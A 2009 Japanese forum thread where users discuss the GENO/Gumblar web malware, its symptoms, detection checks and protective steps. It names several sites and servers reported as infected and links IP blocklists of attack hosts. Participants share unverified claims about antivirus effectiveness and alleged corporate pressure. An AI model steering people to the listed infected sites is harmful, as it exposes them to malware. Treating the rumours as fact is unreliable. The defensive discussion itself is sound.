GENOウイルススレ　★4

・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD

感染が疑わしい人は迷わずクリーンインストール推奨です。

★Anubisレポート
http://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html

★このサイトをブックマーク推奨
ttp://www3.atword.jp/gnome/

★過去スレ
GENOウイルススレ　★3
http://pc11.2ch.net/test/read.cgi/sec/1240853183/
GENOウイルススレ　★2
http://pc11.2ch.net/test/read.cgi/sec/1239364066/
GENOウイルススレ
http://pc11.2ch.net/test/read.cgi/sec/1239152979/

★感染を疑った人の報告
【OS】
【使用セキュリティソフト】
【疑った理由】
【症状】
【確認手段】
【結果】

諸事情でAdobe Reader 最新版を使わざるを得ない場合
2009年4月29日現在の最新版バージョン9.1設定例

１．Adobe Readerを起動し「編集」メニューの「環境設定」
　　「Acrobat JavaScriptを使用」のチェックボックスをオフ（チェックを外す）
　　OKを押して設定確定後、Adobe Readerを終了。
↓
２．必要と好みに応じて Adobe Reader Speed-Up にてプラグインを整理
　　設定は SpeedUp - Fast がおすすめ。
　　　注意すべきは
　　　Acroform（拡張子なし）
　　　Annotations（拡張子なし）
　　　これら2つのチェックボックスをオン（チェックが入っている）状態にしておく必要がある。
　　　そうしないと Adobe Reader が起動しなかったりする。

　　　このとき追加作業として
　　　EScript.apiとEScript.JPNのチェックボックスをオフ（チェックを外す）状態にしておくと
　　　より安心かもしれない。

以下はお約束
上に書いたことを行えば安全という保証はなく、すべて自己責任でお願いします。
またAdobe Readeｒ以外の環境設定をどうするかも各自考える必要があります。

【OS】 Windows Me
【使用セキュリティソフト】 avast! 4.8 Home Edition
【疑った理由】　106hotline.com/guidance/kiso_syougou.html にアクセスしようとしたら、avastが反応したため
【症状】 avastが反応し、警告音と共に「JS:Redirector-H2（トロイの木馬）を検出した」と表示されたので、
　　　　驚いてすぐにIEを閉じたが、「ウイルスチェスト」への移動が「エラー」となり、感染したか未然防止できたか不明
【確認手段】 「TemporaryInternetFiles」の中身を全部削除した後、avastで全ドライブをチェック
【結果】 ウイルスの検出無し

現在拡散している Gumblar.cn
zlkonの亜種ですが以下のような特徴を持っています。

インジェクションコードが難解になった
バージョンチェックをユーザ側で行うため、サーバスクリプトの検出を回避している
　※一部のIDSはサーバスクリプトへのクエリを監視しており、クライアント側でやられても判断できない
感染が容易と思われるPC環境をよりピンポイントに判断している（このため、セキュ各社の自動検出が難しくなっている）
感染しない環境には何も返さない（更に検証が難しい）
亜種の「更新」の頻度が異常にすばやく、亜種がほとんどのセキュソフトを潜り抜けているので、シグネーチャ・ベースでの検出が難しい
　※検出率が上がる頃には次の種類になっている

感染の疑いがある場合
XP / 2000 の方は sqlsodbc.chm をチェックしてください。
※sqlsodbc.chmを使わない亜種の存在が確認されていますので、この方法に完全に頼るのは危険かもしれません。
ttp://www3.atword.jp/gnome/zlkon-gumblar-%E5%95%8F%E9%A1%8C%E3%81%AB%E9%96%A2%E3%81%97%E3%81%A6/

次スレいらないね

・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD

　１．Adobe Flash Player のアップデート
　２．Adobe Acrobat Reader のアップデート
　３．NoScriptの導入（Firefoxの導入）
　４．Adobe Acrobat Readerの JavaScript OFF( >>3 )
　５．危険IPのブロック

感染予防対策

１．Adobe Flash Player の最新版にアップデート
２．Adobe Acrobat Reader の最新版にアップデート
３．NoScriptの導入（Firefoxの導入）
４．Adobe Acrobat Readerの JavaScript 機能OFF
５．危険IPのブロック

随時追加

>>8
すまん被った

どっか踏ませてくれえええええええええ

以下攻撃されたサイト
小林製薬
ttp://www.kobayashi.co.jp/info/090512.html

国内の正規サイト改ざん：攻撃サイトを変え再襲来
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1884

GENOウイルスまとめ
ttp://www29.atwiki.jp/geno/

106hotline.com/guidance/kiso_syougou.html

↑
ウイルスに感染しているサイト

新スレ乙。

規制中なんで携帯からスマソ。さっき俺のバスター先生2009のセキュリティレポの中の｢フィッシング詐欺対策｣てのを見てたら｢h※※p://gumblar.cn〜｣てのが沢山あった。

これって感染サイトにアクセスしたけど一応は先生が守ってくれたって事でいいよな？
カスペとか以外は対策されてないかと思ってた。

まあ初期型のみだろうが…。それにしても知らずにこれだけの数踏んでるなんて。

avast、GDATAの導入

>>14
反応なかた・・・

>>16
GDATAって何？

>>17
106hotline.com/guidance/kiso_syougou.html スクリプト削除済
asagaya-drum.com/ 修復中

>>6
GENO社員乙

現時点で確認出来る対策ソフト　
・Avast!
・Kaspersky

以下随時確認取れ次第追加
但し亜種の発生に追いついていない現状に注意

アンラボも対応済みってきいたけど　

感染の有無の判定方法で、

sqlsodbc.chmのファイルサイズとMD5をチェック

ってのがあるらしいけど、「sqlsodbc.chm」と「MD5」って何？

>>21（前スレ995-1000）
その情報は間違い。

カスペはすり抜けするぜ。（htmlに入ったスクリプト）。バスターもだめ。

カスペに送ったうちの一部は、検出名ついてきたけど、一部は白判定で返答来てるから。
せいぜいがとこ、スクリプトをまともに防げるのは、Avastとソフォスだけだな。

で、落ちてきた実体部分については…ほぼ日替わりだから、対策困難。
検知可能と報告した時点の最新版がスルーすることも多いので、○○なら大丈夫という情報は
嘘情報になりかねないので乗せないほうがいい。

今回のウイルスはパターンファイルじゃ追いつかないんだよなぁ
ttp://www.fourteenforty.jp/products/yarai/index.htm

これなんか良いと思うけど、まだ発売されてないし

前スレ959のリスト
MADET-NET RU :95.2.252.0-195.2.253.255
↑これ範囲が広すぎてほとんどの接続が不能になるぞ。

MADET-NET RU :195.2.252.0-195.2.253.255
の間違いだよな。

>>21
>>24

注意を引きやすいように赤くしておこう

>>24

カスペはスクリプト防げたってみたけど？

うちも踏んでもブロックしてくれたけど

>>21
では、この対策ソフト関係は無しでということで

ネットで生きていくためには俺たちも戦士にならなければならない

んじゃ、逆に旧種に対策されてないソフトをあげたらどうかな？

使っているやついたら乗り換えすすめられる

>>21,24
赤くしとくか

>>15
「フィッシング詐欺対策」って無効にしてるんだけど、設定したほうがいいのかな･･･
レベルは中ですか？それと「URLフィルタ」も有効にしてる？

>>23
マジレス 「sqlsodbc.chm」と「MD5」でググルと一発ｗ

>>26
すまん　195.2.252.0-195.2.253.255の間違い　orz
ファイルを訂正しときます。

ただ、カスペのサポセンに電話して聞いた時は
チェックする際は設定は高にして一度だけではなくスキャンを何度かしてくれと言われた。

対策されてないのなんてあるんか？

安物はやばそうな悪寒はするが

>>37
ノートン先生
http://www3.atword.jp/gnome/2009/05/14/gumblar-%e3%81%8a%e9%a1%98%e3%81%84%e3%81%97%e3%81%be%e3%81%99/

>>33
「フィッシング詐欺対策」オンにしる

>>24

工ｴｴｪ工ｴｴｪヽ(`Д´)ﾉｪｴｴ工ｪｴｴ工

ノートン先生ww

Avast!とカスペはスクリプト(html)は検出してくれたよ。
本体は感染してないから知らんけど。

前936の人横から頂きました�d
でも一部間違えてるみたい

訂正しました
ttp://www.rupan.net/uploader/download/1242366658.txt

>>39
今、中で設定した

>>33
俺は中にしてる。

12日に発生したsaymoveの件でこのウイルスについて調べ始めたが、その>>15のレポートには9日や10日にもブロックの形跡があった…。
恐すぎだろコイツ

AcrobatやFlashをアップデートしても感染することってありえる？

>>28
スクリプトは複数種類存在する。バリエーションの多さについては、このサイトの解説が詳しい。
ttp://ilion.blog.shinobi.jp/Entry/85/


カスペは一部はブロックするが、白判定ですり抜けるスクリプトがあることが判明しています。
（検体提出の返事で、白判定の返答だったから、一部は、確実にスルーすることが確定）
「防げる場合もあるが、防げないケースもある」ものを、「防げる」と言い切っちゃいけないだろ。

>28さんのブロックできたというのは、一部のブロックできるものに遭遇したケースだったってこと。
手持ちのサンプルをVirusTotalにかけた結果を見てくれ。

カスペが確実にスルーするスクリプトが入ってるもの（あさがやドラム）
ttp://www.virustotal.com/analisis/49a3ceec84342ac7a620732d95369a09

カスペが黒判定出してきたのでブロックできるもの
ttp://www.virustotal.com/analisis/e121c6510853846331e8dbda8d55b2b6
ttp://www.virustotal.com/analisis/e10e587087b4fcc821735a4d6ee1e0a3

>>43
パスは？

>>47

ほー

カスペや先生でもこの調子じゃ
弱小ベンダーのはもっとやべえんじゃねえ？

あ、カスペのブラックリストに gumblar.cn 入れてるから、スクリプトの判定では無く、
フィルタリングによってブロックできる・・・・・・・・という意味なら、ブロックできることになるね。

ただ、それも、「設定次第ではブロックできる」ということなので。

gumblar.cn については、こいつならブロック/駆除できると言い切れるものはないでしょ。

javaじゃなくてjavascriptを禁止すればいいんですよね？

完全な防御は不可能か。常に感染していないか気を配って置いて
何らかのバックアップソフトを使っていつでも復元出来るようにしておくのが一番の対策か。

>>51

acrobatとflashをアップデートしれ

javascriptだけだとすり抜けるかもしれん

>>53
どうも、やってみます

IEやFxのフィッシングサイトリストには入ってないのか

>>55

Firefoxのフィッシングリストには入ってるみたい

>>48
こっちね　ttp://www.rupan.net/uploader/download/1242367788.txt

亀でごめん。

前スレの↓とレス（>>879）もらった者ですが、

＞888 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2009/05/15(金) 12:11:34
＞>>859
＞それだけじゃセーフとはいえない
＞>>879
＞横柄とかそんなアホな問題じゃなくて
＞中身が変わりすぎて対応しきれないだけ

「対応しきれない」ってのは、かなり凶悪だよね？
それこそｲﾝﾌﾙｴﾝｻﾞ（強毒）クラスじゃん。

収束すんのだろーか・・・。

>>48
http://pc11.2ch.net/test/read.cgi/sec/1228949365/239-240

>>57
91.211.64.0/23
91.212.65.0/24

は入れないでいいのかな？

>>58

凶悪すぎてうかうかネットできん

知り合いに教えてあげて

>56
Fxで攻撃サイトと偽装サイトの警告を有効にすると重くなるから使ってなかったわ。見直しちゃうぞ。

>>38
404

情弱だが危険IPのブロックってどこでやるんだ？
あと>>57って数字のみ入れるのか？

まだ記入漏れあったか＞＜

ご指摘ありがとです。>>60　入れときます

>>64
ttp://pc11.2ch.net/test/read.cgi/sec/1228949365/
ttp://www.nicovideo.jp/watch/nm2825098

>>62
それ俺も切ってるけど、入れると重くなるだけじゃなく、HDガリガリ凄いんだよな･･･

>>66
誘導さんくす

>>62
それでもIEより全然軽いし

感染サイト

beauty-wed.co.じぇいぴー

Acrobat Reader 5.1 のままなんだけど
ヤバイの？

どこに地雷が仕掛けられているか分からない感じだな。

>>71
LANケーブル引っこ抜いて永遠にネットにつないでくれれば大丈夫。

>>71
むしろ、余計な機能が付いてなくて安全と言えよう。
使わないならアンインストールしちゃいな。

>>71
んな古いのはとっくにディスコンだろ。
「仮に」今回のに引っかからないとしても
他の大穴がいくつも開いていると思われる。

PG2って
バスターとかと競合したりしない？

もう大丈夫だと思われ
ttp://www.rupan.net/uploader/download/1242369471.txt

ご迷惑おかけしました

>>74-75
使ってるけどアップデートしてない
やっぱヤバイのか

感染サイトを随時報告するスレを立てた方がよくない？

前スレでバスターが対応してるってあったけど、ほんと？
もちろん100％ブロックしてくれるとは思わないけど、
一応問題意識は持ってるって事？

>>78
気にスンナ。
そんなことよりもバックアップを取る方を重視しな。
HDD丸ごとバックアップ。
これで安心だよ。
万能な安全策なんてないんだしさ。

>>80
先生よりマシ

今は何を信用していいのかわからん

discontinued＝生産中止
円盤=ディスクを操る=コントロールするところから、ディスク・コントロール、略してディスコン

>>82
レスありがとう

>>67
C:\Documents and Settings\[ユーザ]\Local Settings\Application Data\Mozilla\Firefox\Profiles\[xxxxxxxx].default\urlclassifier3.sqlite
を SQLite Manager とかで Vacuum して Reindex して Defrag したらましになるかも。

PeerGuardian2 日本語版導入しようとしたが出来んわ
リンクページがないといわれる

英語版でいいよ
難しい事なんてないから

いらんやろ

Adobe Reader/Acrobatの脆弱性対策を考える
ttp://internet.watch.impress.co.jp/cda/special/2009/05/15/23451.html

正規サイトに感染広がる：新手のWebベースマルウェアが急拡大
ttp://www.itmedia.co.jp/enterprise/articles/0905/15/news032.html
(Sophos)

あとAdobeReaderのJavaScriptを切るというのは何度も言われているけど
「俺FoxitReaderだから関係ないや」という人もとりあえず切っておきましょう。

PDFビューアーの脆弱性を狙う攻撃 (IBM ISKK)
ttp://www.isskk.co.jp/soc_report/SOC_report_20090428.html
「Foxit Reader」の脆弱性を狙う攻撃が、Webサイト経由で行われていることを確認しています。
不正な PDFファイルを表示させようとする Webサイトでは、
「Adobe Reader / Acrobat」「Foxit Reader」両方を攻撃するための PDF が準備されているため、
どちらのアプリケーションを利用している場合も注意が必要です。

>>79
それ個人サイトも対象？

>>79
頼むよ。
手っ取り早く情報を得られていいね。

立てた方がいいかもね
テンプレで専ブラも直リンできない形式を推奨して

>>77
頂きました。
thanks!

>>77おつ〜

>>79
感染を完璧に把握する方法はまだないわけで

セキュリティソフトが警告を出したサイトを随時報告するスレ
あたりにしとくのがいいんじゃね？

確かに焦って無実なサイトを晒すのは非常にまずい。

ここでやればいいよ

GENOウイルスとやらに感染していたらしい
ttp://magnet.at.webry.info/200905/article_4.html

こりゃウイルスかもしれんとレジストリエディタ起動しようとしたら起動しない。
regedit.exeをリネームすると起動できる(苦笑)。

このウイルスってWebサイトが感染しているというより
Web制作に関わっている企業が感染してんだよな
小林製薬のケースだと広告代理店経由で別の商業サイトも請負って
それを下請けや孫請けという流れで不特定多数が関わっているだろうから
何度直しても気づかないうちにまた再感染して拡大して
ビッチグループに獲り付いた悪質な性病みたいだな

Web制作会社に損害賠償請求てあんの？

前スレにも出てたね制作会社の話
いくら不況とは言えサイト作りまくってるだろうからやばすぎ

これって、感染者がアクセスしただけではサイトには感染しないの？
サイトの管理者がどっかで踏んできて、ソースが書き換えられない限りはＯＫなの？

・・・。

>>102

おそらく
パスとか盗まれるからそれでもやばい

>>102
そうなったら大混乱だお。

すでに大混乱になってもおかしくないはず
一説によるきんたまみたいなこともやらかすらしいぞ

キーロガー＋キャプチャー

>>77
これウイルスバスターで設定したいんだけど
ttp://esupport.trendmicro.co.jp/supportjp/viewxml.do?ContentID=JP-2062279
ここ見てもどう設定していいか分かんない･･･orz

方向　○受信　○送信

処理　○許可　○拒否　○警告

プロトコル　○TCP　○UDP　○TCP/UDP　○ICMP(IPv4)　○すべて　○カスタム

タイプ　○すべての種類　○指定の種類

タイプ
○すべてのIPアドレス
○IPアドレス(IPv4)
○指定範囲のIPアドレス(IPv4)
○サブネットマスク(IPv4)
○ブロードキャスト
○マルチキャスト(IPv4)
○ローカルネットワーク

サポートに聞いたほうがいいかなｗ？

それと注意書きに
例外ルール設定に、トロイの木馬が使用するプロトコルとポート番号を設定した場合については
トロイの木馬アタックを防ぐことができません。
例外ルール設定の追加に関しましては、お客様の自己責任でおこなっていただきますよう
お願いいたします。

ってあるのはどういう意味だろ･･･？

久しぶりに覗いたらトンチンカンな奴ばっかでﾜﾛﾀ

どうトンチンカン

>>107
せっかく買ったソフトなんだからサポートを活用すれば良いよ

前スレにでてたニフティは大丈夫なんでしょうか？
昨日ニフティのセキュリティ通信を見ていたのですが。。。

上のほうでソフォスおｋって出てたけど、ガチ？
入れてるやつ防げた？

たしかにトンチンカンだ

>>111

レンサバのほうだよ

>>1のサイトの人
記事削除しちゃった？

>>111
多分あれは貸し出してる鯖で感染者出てるって警告送っても
該当サイトを削除しないってことじゃないか？
ニフティの全鯖が犯されていたら阿鼻叫喚になるぞｗ

どっかの圧力？？？
http://www3.atword.jp/gnome/2009/05/15/%e8%a8%98%e4%ba%8b%e5%89%8a%e9%99%a4%e3%81%ae%e3%81%8a%e7%9f%a5%e3%82%89%e3%81%9b%e3%81%a8%e3%81%8a%e8%a9%ab%e3%81%b3/

>>116
気になるなｗｗｗ

個人鯖かな

かなり有用な情報だったのに残念だ
セキュリティに疎い人にはあれぐらいハッキリ書かないとわからないだろうに

>>81
アクロニスで定期的にバックアップはしてるよ
頻度上げよっかな

>>116
大手企業もやられてるし
ニムダ以上に悪質で感染者も多い筈なのに全然報道されずにいる。
やっぱりやられた大手企業が・・って疑うよね。

まぁアレげな会社が1社混じってるい、そこだろうな。

みかかウゼェ

本当に報道されなさ過ぎだよね

不自然にｗ

>>116
SAKURAインターネット
株式会社 PURENIC JAPAN
NTTコミュニケーションズ
ニフティサーブ ネットワーク

脅したのは誰だ？許さんぞ

macの報告ないね・・・
気付いてないのかな

このスレで補完したいけど難しいかなぁ

さくら悪くないモン！

cmd.exe、regedit.exeを両方とも起動できる場合は感染してないと見ていいの？

ここも参考になる
ttp://jvnrss.ise.chuo-u.ac.jp/csn/index.cgi?p=cNotes

いいえ

>>126
OSXでWindows用のexeが動くわけないっつーか
そもそもNT6(Vistaとか7とか)を除くWindows、と
スクリプトで選別してるんだが

勢いトップだなここｗ

2Kなんですけど、sqlsodbc.chmが検索してもでてこないんです
（sqlsodbc.hlpならありました）
これって感染してるんでしょうか？すみませんが教えてください

無いならいいんじゃね?

ありがとうございます　てか無くてもいいんですか？

>>134
2Kは出てきたらアウトだよ

オウム返ししてんじゃねーよ

誰か消されたデータの魚拓取ってない？

あそこに貼ってたサイト全部NGにぶち込みたいわ

>>137
ありがとうございます！助かりました
>>138
ごめんなさい、心配だったのでつい、、これにて退散します　お邪魔しました

>>139
>>125は？

前スレからのコピペ
※各社レンタルサーバーを使ってるサイトが感染してるだけで
その大元が感染してるわけじゃないので注意

SAKURAインターネットさん
　www1722.sakura.ne.jp
　sv172.lolipop.jp
　sv11.chicappa.jp

株式会社 PURENIC JAPAN さん
　p09ns7.puretopure.jp
　
NTTコミュニケーションズさん
　120.29.185.234(VPS-TOKYO2)

ニフティサーブ ネットワーク(ニフティ株式会社さん
　61.121.100.119

の該当データの停止を行ってください。
何度Mail送っても反応無いので・・・・・

直接じゃなくてatwordに脅しかけてきたんでねーの?
んでatwordから記述消さないとBANするよ、みたいな。
たいていどこから脅されたかは明かさない。

アクセスが減ると一番困るのはポータルや通販もやっているところだな

つーか早晩大問題になるのに火消ししようなんて脅し掛けた担当者頭イカれてんじゃないの？

>>116
うわあｷﾀﾅｲwさすが隠ぺい体質だな
たぶんあそこだろwｷﾀﾅｲﾅ

「その後放置、無告知で再開」といえば・・・

感染してるけど管理人が無視だからアクセスするなよと
各サイトを表示してるのに、そういう有益情報を削除させるとか・・・
中の人には頑張ってほしい・・・

>>前スレ894,896
ありがとう
亀レスでスマン、プロトコルとかそういうのに自信ないんで聞いてしまった
前スレ896>　某メーカーのルータはフィルタリングしても効いてないやつあるから注意な
そんなルータあるんですかｗ　一応確認済みなんで大丈夫です
---
>>77（乙です）にCIDR表記を追加したのをうｐしておきます
CIDR設定用に作っただけなんでPG2の人は>>77のを使ってください
ttp://www1.axfc.net/uploader/File/so/23641.txt
なお、1,2行目のAltaVistaはIPが被ってるので簡単にコメント追加しておきました

>>142
それを見て大元の鯖が感染してると思い込んでるようなレスもあったからね
貴重な情報くれてる管理人さんにはめげずに頑張って欲しいわ

なぜニュースにならない

　　★GENOウイルス無料パンデミックキャンペーン中★

　　　　　　　　　☆対策はお早めに☆

>>130のとこ、「続き」になってるからその前の記事開いたら
そこでavast!が反応した…スパイボットもレジストリ変更する？って聞いてきたから
びびって慌ててavast!検知画面で削除して、スパイボットも変更遮断したけど
ただ単に過剰反応しただけなのかどうかﾜｶﾝﾈ

とりあえずavast!で全部ファイルチェックしてくるわ…

>>151
このスレでさえsage進行だからなｗ

>151
Yahooニュースにも載ってるんだが

Yahooニュースさえ見えるのが怖い

>>139　
コレはあきらめモード・・・・

あと、

ケンタッキーフライドチキンの関係者の方はパキスタンのサイトを何とかしてください

Canonの方は Canon Texus のガバメントオフィスのサイトを何とかしてください

以上のサイトは私が確認してから、優に１週間以上経過しているものがあります。

何卒、よろしくお願いいたします。

--------------
あと、センセイ・・
そろそろナントカしてくれませんか？



てか、○ー△□先生が怒ったのだろうｗ

9行目を消してください　って言って対応してる企業云々
ってやつもあったよね？

[gumblar] お願いします
Posted in Announce on 5 月 14th, 2009 by gnome

今日とうとう、4000/day PVを超えました
つまりそれだけの人が関心を持っているということです

それで、お願いです

SAKURAインターネットさん
　www1722.sakura.ne.jp
　sv172.lolipop.jp
　sv11.chicappa.jp

株式会社 PURENIC JAPAN さん
　p09ns7.puretopure.jp
　
NTTコミュニケーションズさん
　120.29.185.234(VPS-TOKYO2)

ニフティサーブ ネットワーク(ニフティ株式会社さん
　61.121.100.119

の該当データの停止を行ってください。
何度Mail送っても反応無いので・・・・・

あー
　s247.xrea.com
　s309.xrea.com
コレはあきらめモード・・・・

あと、

ケンタッキーフライドチキンの関係者の方はパキスタンのサイトを何とかしてください

Canonの方は Canon Texus のガバメントオフィスのサイトを何とかしてください


以上のサイトは私が確認してから、優に１週間以上経過しているものがあります。

何卒、よろしくお願いいたします。

>>158
行じゃなくて9割ってやつ？

>>157
そういや>>38が消えてるわｗ

>>161
ごめんそうだと思う。
読み流して、後でちゃんと読もうと思ってたら消えたｗ

魚拓ツールで復活ｗ

ヤフニュースどこにある？
Adobe脆弱ニュースしかみつけられんかった

ノートン先生が侮辱を受けたと聞いて飛んできました！

>>153
ソースチェッカー通して覗いたらavast!さんが大騒ぎした

>>163
リンクされてたのはここ
http://www.imagic.co.jp/info090514.html

>>165
これのことかも？
ttp://headlines.yahoo.co.jp/hl?a=20090515-00000002-vgb-secu

>>168
�d

前スレ907 名前：名無しさん＠お腹いっぱい。　[sage]　投稿日：2009/05/15(金) 12:59:00 　　　New!!
ちょっとまてよ…
firefoxにieのレタリングをアドオンをすれば
限りなくieの脆弱性をもつfirefoxになるのか？どうだろ
　　　　　　　　　　　　　　　　　　↑
このウイルスの話ではないけど
IEのスクリプトによる貼り付けの設定で
IEデフォルトの「ダイアログを表示」のままだとダイアログ出ないでクリップボードの中身
見られ放題になるよ

Internet Explorerの「スクリプトによる貼り付け処理」機能の能力を検証する
ttp://java-house.jp/~takagi/security/misc/jscript-clipboard/test.html

undonut+modのスレで話題になってたのでIE TABで試したらなってた
他にもこういうの有るのかはわからないけど

うぉい！ニフティでオンラインウイルスチェックすると感染するってマジかよ！

このサイトも感染してるみたいだ検証よろ
ttp://expss.main.jp/expss2/2005/08/

わざと祭りにしようとしてるだろ

>>167
該当サイトはｱｳｱｳってことか

ああでも>>153は無事なのか？いまいち153がわからん
スパイボットて関係あるか？

わざと祭りにしないようにしてるだろ

>>171
ソースはなんだ？

>>171

ニフティっていうのは
ホスティングサーバーの話だっつーの

>>173
GENO社員乙

このスレに貼られたサイトはとりあえずaguseで見るようにしよう

ソースは２ちゃんねる！ﾌﾟｷﾞｬｰ!!

http://namidame.2ch.net/test/read.cgi/poverty/1242359071/1-100

ミカカか薬事ヤクザにきまってんだろ

>>170
レタリングｗｗｗｗ
レンダリングだろｊｋ

>>172
トロイの木馬を発見しました！
トロイの木馬を発見しました！
トロイの木馬を発見しました！
トロイの木馬を発見しました！
トロイの木馬を発見しました！
トロイの木馬を発見しました！
トロイの木馬を発見しました！
トロイの木馬を発見しました！
トロイの木馬を発見しました！
トロイの木馬を発見しました！


ブラクラレベルだ！

>>47
疑わしいサイトをどうやってVTに掛けてるの？
mhtでローカルに保存して、VTへアップロードとかじゃダメだよね？

ﾌﾞﾗｼﾞｬｰｸﾗｯｼｬｰ!!

>>50
カスペのブラックリストってどこで参照できる？
KIS7を使用中なので・・・

>>183
今のところ最凶。。。

>>57
3回ほどアップしてくれているみたいだけど、うちの環境ではIDが不正です。
となって、DLできません。

他に感染したURLは見つかっていないのか？

不安なのでニフティでオンラインチェックしてきた
とりあえず検出されなかった

しかし怖いなー
IP焼きもとか不慣れだからあってるかどうか不安になってくるよ

Firefoxのフィッシング警告を出すサイトのリスト更新（パターンファイルの更新）って、どのタイミングでやってるんだろう？
3.0.10とかのバージョンアップの時？
もうだいぶ、時間たってるんだけど・・・

やっとセキュmemoに出たな。
ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/2009/05.html#20090515
もう感染したサイト管理者は知らん振りできないだろうなｗ

>>182
それは前スレのコピペだからね

>>189
ある事はあるが
個人サイトだからなぁ

削除を要求したのは、GENOか。

>>182
一々タイピングミスにそんなレスするなよ

>>194
ないしょか？！

>>107
ウィルスバスター使ってないけど、おそらくこうすればよい。

方向　受信送信　の両方
処理　拒否
プロトコル　○TCP/UDPでいいはずだけど、一応○すべて（うちのカスペではTCPとUDPのそれぞれでルール作らなきゃダメみたい）
タイプ　○すべての種類
タイプ　○指定範囲のIPアドレス(IPv4)

>サポートに聞いたほうがいいかなｗ？
サポートが再開したら、すぐに問い合わせて、結果をここに貼ると、みんなが助かる。
時間的に、今日はサポートにつながらないと思うから、「多分これであってる」ってのを俺は書いているだけ。

>例外ルール設定に、トロイの木馬が使用するプロトコルとポート番号を設定した場合については
>トロイの木馬アタックを防ぐことができません。
例外ルールで危険アドレスを登録すると、そっちの優先順位の方が高い為、せっかくここで拒否したアドレスにもつながる。

これってこういう状態か？

感染サイトにアクセス
　　　　↓
ｼﾞｬﾊﾞｽｸで勝手にウィルお持ち帰り（中国ドメインのところからダウンロード？）


それとも

感染サイトにアクセス
　　　　↓
ｼﾞｬﾊﾞｽｸでhtmlに埋め込まれたウィルスコードがキャッシュでPC内に潜入
プログラム言語の状態から根性で感染


どういうふうに感染するんだろう？

>>197
個人サイトだからここに書く事は出来ないって事でしょう

個人サイトであっても、ここに書けば被害拡大が防げると思うんだが。

>>77
これって
適当なファイル名で保存して
PG2のリスト管理で追加すればいいの？

>>194はまずその管理者に連絡だな
正確なアドレスがまずいなら最上位のドメインだけでいいからここに書いてくれ
駆除したとわかった時もここに

>>191
そんな古かったら意味ないよね
http://d.hatena.ne.jp/Rockridge/20090419

>>203
そんな書き方したらニフティみたいに混乱を招くだけでしょ

>>199
略称っぽいのがすごく気持ち悪いんだけど
どっちかというと上です

>>205
本人が明かせないって言ってるんだから仕方ない
知らずにアクセスするよりいい

GENO見に行ったけど
avast!ぴくりとも反応しないぞ？

他のサイト教えれ

>>208
今は対処済みらしい





らしい

>>208
万が一があるから面白がるのやめときｗ

>>208

>>172

>>77
これ一つ一つ全部入力するの？入れた人どれぐらいかかった？

>>202のやり方じゃダメなの？

急にスレの流れが速くなってたんだけど
なにかあったんですか？

やべ 俺のサイト感染してるわ

>>203
AVASTで誤検出かもしれないけどウィルスを発見しましたって連絡いれたら
自分のところのアンチウィルスでは検出しませんでしたから大丈夫と
思いますって返信がきた
その返信を見に行ったらウィルス警告がパワーアップしてたから
それ以来怖くて近寄っていない

>>214
ここ数日で個人サイトなどに感染拡大

自分のサイトが感染して改変された場合
自分でソース見たらわかりますか？

>>218
HP制作ソフトに完全に頼りきっていたらパッと見わからないと思う
htmlソースに普段から自分で手を加えていたりすれば判る

Vistaは大丈夫っていうのは本当ですか？

>>213
PG2ならファイル読めるんですか？

セキュリティソフトに付いてるFWには
手入力かなと思って

カスペオンラインスキャン、avastでもウイルス検知されなかったんだけど。
sqlsodbc.chm 1.29 KB (1,323 バイト)が改ざんされたっぽいんだが、
更新日時が3/21なんです。
これって、感染してるんでしょうか？

>>219
レスありがとう
自分は感染してないっぽいです
助かりました

>>222
レジストリエディタ起動して味噌

これだけ恐ろしいウィルスなのに
未だテレビでニュースにならないのは何故
きんたまとかはニュースになったのに

きんたまとかもニュースになったのは大分後じゃなかった？

>>217
ありがとうございます。
やばいですね〜。

>>216
そのサイト管理人やばいなw

感染サイトを覗いたわけではないが、このスレ見てたら怖くなってきた

素人ですいません。
regedit　でファイル名実行しても起動しません。

>>216
晒せよもう
そんなアホなサイトは

>>216
こんな管理者ばっかだもん、広まるわなｗｗｗ

>>230
＼(^o^)／

なんで釣りとか荒らしとかは
すぐにスレをageたがるんだろうな

>>230
 カスペオンラインスキャン
ttp://www.kaspersky.co.jp/virusscanner

確認！！

もう、真面目な忠告聞かない馬鹿サイトは潰れていいよ
自分の甘さを後悔するがいい

>>222
感染してるから、とりあえず、ランケーブル抜いて、大事なファイルをバックアップとってから
ＯＳを再インストール汁。

カスペオンラインスキャン、avastともにウイルスは検出しませんでした。

検索誘導用
GENO zlkon gumblar ウイルス トロイの木馬 スパイウェア

誤検出がもしれんが
個人のHP見ようとしたら警告でた
マジで感染者増えてきてる

広告代理店が感染してるから
これからどんどん広がる

>>238
そんな早くスキャン終わらんだろｗ
釣か？

>>198
ありがとう、明日試してみる

いや
サポートに聞けよ

安心して見れるサイトってもう無いんじゃね

カスペオンラインスキャン、avastでスキャンしてから質問させてもらいました。

>>241
kwsk
どこのやつ？

空白いれたままOK押してるんじゃ

ここIDでないから、分かりづらいねｗ

関係ないけど、なんででる板とでない板あんの？

>>245
そこでビスタですよ

age厨は釣り

＞例外ルール設定に、トロイの木馬が使用するプロトコルとポート番号を設定した場合については、トロイの木馬アタックを防ぐことができません。

バスターのじゃ無理なんじゃないの？

>>250
陰謀だー

ttp://www3.atword.jp/gnome/

grumble whatever
Posted in Misc on 5 月 15th, 2009 by gnome
愚痴、見なくていいです

そもそも、この gumblarは zlkon の頃からずっと取り上げてきたので、gumblarの爆発的な感染を察知したときに、「無視する」というオプションをとることができませんでした。
